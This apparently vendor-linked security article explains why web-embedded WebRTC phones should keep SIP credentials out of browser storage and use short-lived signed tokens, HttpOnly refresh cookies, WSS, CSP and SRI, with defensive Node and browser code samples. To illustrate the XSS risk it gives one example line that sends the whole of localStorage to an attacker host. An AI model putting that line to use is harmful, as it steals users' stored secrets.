
Why your embedded web phone should never store SIP credentials in the browser

Justin



When you embed a WebRTC phone into a web application, you eventually have to decide where the SIP credentials live. The user needs to authenticate with a SIP server. The phone needs those credentials to register. At some point, someone asks: can we just put them in localStorage?

The answer is no. This article explains why, and what to do instead.

What SIP credentials actually represent

A SIP username and password is not just a login for a phone call — it is the key to a registered extension on a PBX. With those credentials, someone can register your extension from anywhere in the world, make outbound calls billed to your account, intercept your inbound calls, and in many Asterisk or FreeSWITCH environments, use your extension as a foothold to probe others on the same system.

SIP fraud via stolen credentials is not a theoretical concern. It costs the telecoms industry hundreds of millions of dollars annually and happens routinely to systems where credentials were handled carelessly.

Why the browser is a poor place to store secrets

localStorage persists across sessions and is readable by any JavaScript running on the same origin. If your application has a single XSS vulnerability — in your own code, in a dependency, or in a third-party script loaded on the same page — everything in localStorage can be exfiltrated in one line:

fetch('https://attacker.com/steal?d=' + JSON.stringify(localStorage))

Cookies with the HttpOnly flag are not readable from JavaScript, which is an improvement, but the browser attaches them automatically to requests to your domain, so any endpoint that relies on them needs CSRF protection (the SameSite cookie attribute and anti-CSRF tokens are the usual defenses). Session storage is scoped to a single tab and cleared when that tab closes, but it is still fully accessible to any script running on the page.

The browser is an environment designed to run code from multiple sources. Treating it as a secure store for long-lived telephony credentials is the wrong mental model — a point the OWASP HTML5 Security Cheat Sheet makes explicitly with respect to session identifiers and other sensitive data.

The correct approach: short-lived tokens

The right pattern is to never send the SIP password to the browser at all. Instead:

  • The user authenticates to your application through your normal login flow
  • Your server generates a short-lived token scoped to that user’s SIP identity
  • The browser presents the token to the SIP gateway
  • The gateway registers the SIP extension on the user’s behalf — the actual password never leaves the server
  • The token expires after a short window — minutes, not days

This is the same pattern used by Twilio (access tokens, which replaced its older capability tokens), Vonage (JWT), and any properly architected browser phone. A stolen token has a limited useful life and is scoped to a single user’s identity. It is not the same as a stolen password.

JWT as a SIP auth token

JSON Web Tokens are a natural fit here. Your server signs a JWT containing the user’s SIP identity and an expiry:

{ "sub": "user@yourdomain.com", "sip_identity": "1001@pbx.yourdomain.com", "exp": 1712180000, "iat": 1712176400 }

The exp claim is the important one. Set it to 15 to 60 minutes depending on your session model. The SIP gateway validates the JWT signature server-side and handles registration. The browser presents a token and makes calls. It never sees a SIP password.
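The issue-and-verify step can be sketched with nothing but Node's built-in crypto module. This is a minimal illustration, not a production implementation: the function names, the shared secret, and the 15-minute default are assumptions, and it uses HS256 (a symmetric HMAC signature), which presumes your application server and the SIP gateway can share a secret. A maintained JWT library and an asymmetric algorithm may suit a real deployment better.

```javascript
const crypto = require('crypto');

// Hypothetical shared secret between your app server and the SIP gateway.
// In a real deployment this would come from a secrets manager, not source code.
const SIGNING_SECRET = 'replace-me-with-a-long-random-secret';

const b64url = (value) => Buffer.from(value).toString('base64url');

// Sign a compact HS256 JWT carrying the user's SIP identity and a short expiry.
function issueSipToken(userEmail, sipIdentity, ttlSeconds = 900,
                       now = Math.floor(Date.now() / 1000)) {
  const header = b64url(JSON.stringify({ alg: 'HS256', typ: 'JWT' }));
  const payload = b64url(JSON.stringify({
    sub: userEmail,
    sip_identity: sipIdentity,
    iat: now,
    exp: now + ttlSeconds,
  }));
  const signature = crypto.createHmac('sha256', SIGNING_SECRET)
    .update(`${header}.${payload}`)
    .digest('base64url');
  return `${header}.${payload}.${signature}`;
}

// Gateway-side check: verify the signature first, then reject expired tokens.
// Returns the claims object, or null if the token should not be trusted.
function verifySipToken(token, now = Math.floor(Date.now() / 1000)) {
  const parts = token.split('.');
  if (parts.length !== 3) return null;
  const [header, payload, signature] = parts;

  // The HMAC is always recomputed with SHA-256, whatever the header claims.
  const expected = crypto.createHmac('sha256', SIGNING_SECRET)
    .update(`${header}.${payload}`)
    .digest();
  const given = Buffer.from(signature, 'base64url');
  if (given.length !== expected.length ||
      !crypto.timingSafeEqual(given, expected)) {
    return null;
  }

  const claims = JSON.parse(Buffer.from(payload, 'base64url').toString('utf8'));
  if (typeof claims.exp !== 'number' || claims.exp <= now) return null;
  return claims;
}
```

The payload is only parsed after the signature check passes, so the gateway never acts on claims it has not authenticated. The now parameter exists purely so the expiry logic can be exercised with a fixed clock.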

SDKs that act as a WebRTC-to-SIP proxy are well suited to this kind of architecture, because the SIP credentials never need to reach the browser in the first place: the proxy holds them and the browser authenticates against the proxy with a short-lived, scoped credential. For developers integrating this pattern in production, the Siperb Web Phone for developers documentation covers the implementation detail.

Token refresh

The common objection to short-lived tokens is that they need a refresh mechanism. This is true, and it is not particularly complex — it is the same pattern used for API access tokens in most modern web applications.

  • Issue a short-lived access token (15 to 60 minutes) and a longer-lived refresh token (hours). Store the refresh token in an HttpOnly cookie, where JavaScript cannot reach it
  • When the access token approaches expiry, the SDK requests a new one from your server using the refresh token
  • Your server validates the refresh token, issues a new access token, and rotates the refresh token on each use
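The server side of the steps above might look something like the following sketch. Everything named here is hypothetical: the in-memory Map stands in for whatever shared store you actually use, and the cookie name, path, and eight-hour lifetime are placeholders. It shows single-use rotation and a Set-Cookie value that keeps the refresh token out of reach of page scripts.

```javascript
const crypto = require('crypto');

// In-memory store for illustration only. A real service would use a database
// or cache shared by all app servers. Maps a token hash to its owner and expiry.
const refreshTokens = new Map();

// Store only a hash, so a leaked store does not leak usable tokens.
const hashToken = (token) =>
  crypto.createHash('sha256').update(token).digest('hex');

// Create an opaque random refresh token and remember its hash.
function issueRefreshToken(userId, ttlSeconds = 8 * 3600,
                           now = Math.floor(Date.now() / 1000)) {
  const token = crypto.randomBytes(32).toString('base64url');
  refreshTokens.set(hashToken(token), { userId, expiresAt: now + ttlSeconds });
  return token;
}

// Exchange a refresh token for a new one. The presented token is deleted
// before anything else happens, so each refresh token works exactly once.
function rotateRefreshToken(presentedToken, now = Math.floor(Date.now() / 1000)) {
  const key = hashToken(presentedToken);
  const record = refreshTokens.get(key);
  if (!record) return null;                 // unknown or already used
  refreshTokens.delete(key);
  if (record.expiresAt <= now) return null; // expired
  return {
    userId: record.userId,
    refreshToken: issueRefreshToken(record.userId, 8 * 3600, now),
  };
}

// Set-Cookie header value for the refresh token. HttpOnly hides it from
// JavaScript, Secure limits it to HTTPS, and SameSite=Strict plus a narrow
// Path reduce the CSRF exposure of the refresh endpoint.
function refreshCookie(token, maxAgeSeconds = 8 * 3600) {
  return `sip_refresh=${token}; Max-Age=${maxAgeSeconds}; ` +
    'Path=/auth/refresh; HttpOnly; Secure; SameSite=Strict';
}
```

After a successful rotation the server would issue a fresh access token for record.userId and send the new refresh token back with refreshCookie. A second attempt to use an already rotated token returns null, which is a useful signal that the token may have been stolen.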

From the user’s perspective, their phone continues working without interruption. The credentials stay on the server throughout.
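On the browser side, the uninterrupted experience comes down to refreshing a little before the access token expires. The sketch below is one way to schedule that. The helper names are hypothetical, fetchToken stands for whatever async call your application makes to its own refresh endpoint, and the 60-second safety margin is an arbitrary choice.

```javascript
// Read the exp claim from a JWT without verifying it. That is acceptable for
// scheduling only; the server still verifies every token it receives.
function readExpiry(jwt) {
  const payload = jwt.split('.')[1];
  const base64 = payload.replace(/-/g, '+').replace(/_/g, '/');
  return JSON.parse(atob(base64)).exp;
}

// Milliseconds to wait before refreshing: a safety margin ahead of expiry,
// clamped so it is never negative.
function msUntilRefresh(expSeconds, nowMs = Date.now(), marginSeconds = 60) {
  return Math.max(0, (expSeconds - marginSeconds) * 1000 - nowMs);
}

// Hand each token to onToken and schedule the next refresh.
// fetchToken: hypothetical async function resolving to a new JWT string.
// Returns a function that cancels the pending refresh.
function keepTokenFresh(initialToken, fetchToken, onToken) {
  let timer = null;
  const schedule = (token) => {
    onToken(token);
    timer = setTimeout(async () => {
      try {
        schedule(await fetchToken());
      } catch (err) {
        // Refreshing stops here; the app should send the user back to login.
        console.error('Token refresh failed', err);
      }
    }, msUntilRefresh(readExpiry(token)));
  };
  schedule(initialToken);
  return () => clearTimeout(timer);
}
```

Because the refresh token travels in an HttpOnly cookie, this code never touches it. It only ever sees the short-lived access token that the server returns.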

A note on WSS

Encrypting the signalling channel — using WSS rather than plain WebSocket — is necessary and you should be doing it regardless. But it is worth being clear about what it protects: credentials in transit. TLS does not protect credentials sitting in the browser’s storage. An XSS attack reads from the client directly and does not need to intercept network traffic.

Use WSS, and do not store credentials in the browser. The two measures address different threats, and neither is a substitute for the other.
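One inexpensive way to make the WSS requirement hard to get wrong is to check the signalling URL before the phone connects. A minimal sketch, assuming a hypothetical helper name and gateway URL; it relies only on the standard URL class available in browsers and Node.js:

```javascript
// Refuse any signalling URL that is not wss://, so a misconfigured
// environment fails loudly instead of silently falling back to plain ws://.
function assertSecureSignallingUrl(url) {
  const parsed = new URL(url);
  if (parsed.protocol !== 'wss:') {
    throw new Error(
      `Refusing insecure signalling URL: ${parsed.protocol}//${parsed.host}`
    );
  }
  return parsed.href;
}

// Example: assertSecureSignallingUrl('wss://gateway.example.com/ws')
// returns the URL unchanged, while a ws:// URL throws.
```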

A checklist before shipping

  • SIP password never transmitted to the browser
  • Short-lived JWT or capability token used for SIP authentication
  • Token expiry set to 60 minutes or less
  • Refresh token stored in an HttpOnly cookie, not in localStorage or session storage
  • All signalling over WSS
  • Content Security Policy headers configured to restrict script execution to known origins
  • Subresource Integrity on any third-party scripts loaded on the same page as the phone

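The last two are often skipped in telephony integrations. A well-configured CSP header meaningfully reduces the XSS attack surface. SRI makes the browser refuse a third-party script whose contents no longer match the hash you published, so a compromised CDN cannot silently swap in malicious code on a page with an active phone session.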
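Both items can be generated at build or deploy time. The sketch below computes a Subresource Integrity value with Node's crypto module and assembles a basic Content-Security-Policy header value. The helper names and the example origins are placeholders, and the directive set is a starting point under those assumptions rather than a complete policy for any particular application.

```javascript
const crypto = require('crypto');

// Compute the value for a script tag's integrity attribute:
// the algorithm name, a dash, then the base64-encoded digest of the file.
function sriHash(scriptContents) {
  const digest = crypto.createHash('sha384')
    .update(scriptContents)
    .digest('base64');
  return `sha384-${digest}`;
}

// Build a Content-Security-Policy header value that limits where scripts
// may load from and where the page may open connections (including WSS).
function buildCsp({ scriptOrigins = [], connectOrigins = [] } = {}) {
  return [
    "default-src 'self'",
    ["script-src 'self'", ...scriptOrigins].join(' '),
    ["connect-src 'self'", ...connectOrigins].join(' '),
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Example with placeholder origins:
// buildCsp({
//   scriptOrigins: ['https://cdn.example.com'],
//   connectOrigins: ['wss://gateway.example.com'],
// });
```

The sriHash output goes in the integrity attribute of the script tag, alongside crossorigin="anonymous" for scripts served from another origin. Listing the gateway under connect-src also means an injected script cannot open a WebSocket to an arbitrary host.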

A well-designed browser phone keeps SIP credentials off the browser by default. If you are evaluating WebRTC phone SDKs, how credentials are handled is a reasonable thing to ask about — the answer tends to reveal a fair amount about how the product was designed.
